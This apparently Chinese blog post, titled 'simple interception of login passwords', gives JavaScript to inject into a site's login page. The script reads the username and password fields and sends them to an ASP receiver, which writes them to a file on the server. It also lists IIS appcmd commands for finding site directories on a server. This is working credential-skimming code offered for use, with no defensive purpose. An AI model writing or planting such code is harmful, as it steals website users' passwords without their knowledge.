简单的截获登录密码

简单的截获登录密码
发送端的代码

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<script type="text/javascript">// <![CDATA[
functiongetpass()
{
varname=document.getElementById("username").value;
varpass=document.getElementById("password").value;
varxmlhttp;
if(window.XMLHttpRequest)
  {// code for IE7+, Firefox, Chrome, Opera, Safari
  xmlhttp=newXMLHttpRequest();
  }
else
  {// code for IE6, IE5
  xmlhttp=newActiveXObject("Microsoft.XMLHTTP");
  }
xmlhttp.open("GET","save.asp?u="+ name +"&p="+ pass,true);
xmlhttp.send();
}
// ]]></script>

把这段加入到之间。方便加载
接收端save.asp的代码

?
1
2
3
4
5
6
7
8
9
10
11
12
<%
dim user,pass,fs,fname
user = Request.QueryString("u")
pass = Request.QueryString("p")
set fs=Server.CreateObject("Scripting.FileSystemObject")
set fname=fs.CreateTextFile("C:\wwwroot\f4ck.htm",true)
fname.Write(user + "
" + pass)
fname.Close
set fname=nothing
set fs=nothing
%>

修改C:\wwwroot\的路径即可

 

iis7.0命令行下列网站的物理目录
CD %systemroot%\system32\Inetsrv\
如果您运行的是 64 位 Windows,请从 %windir%\system32\inetsrv 目录而不是 %windir%\syswow64\inetsrv 目录中使用 Appcmd.exe。

C:\Windows\System32\inetsrv>appcmd list VDIR
VDIR “Default Web Site/” (physicalPath:%SystemDrive%\inetpub\wwwroot)
VDIR “Default Web Site/PerlEx/” (physicalPath:C:\Perl\eg\PerlEx)
VDIR “test/” (physicalPath:C:\inetpub\other)
VDIR “test/t” (physicalPath:C:\inetpub\other)

可惜了,要管理员权限.

你可能感兴趣的:(简单的截获登录密码)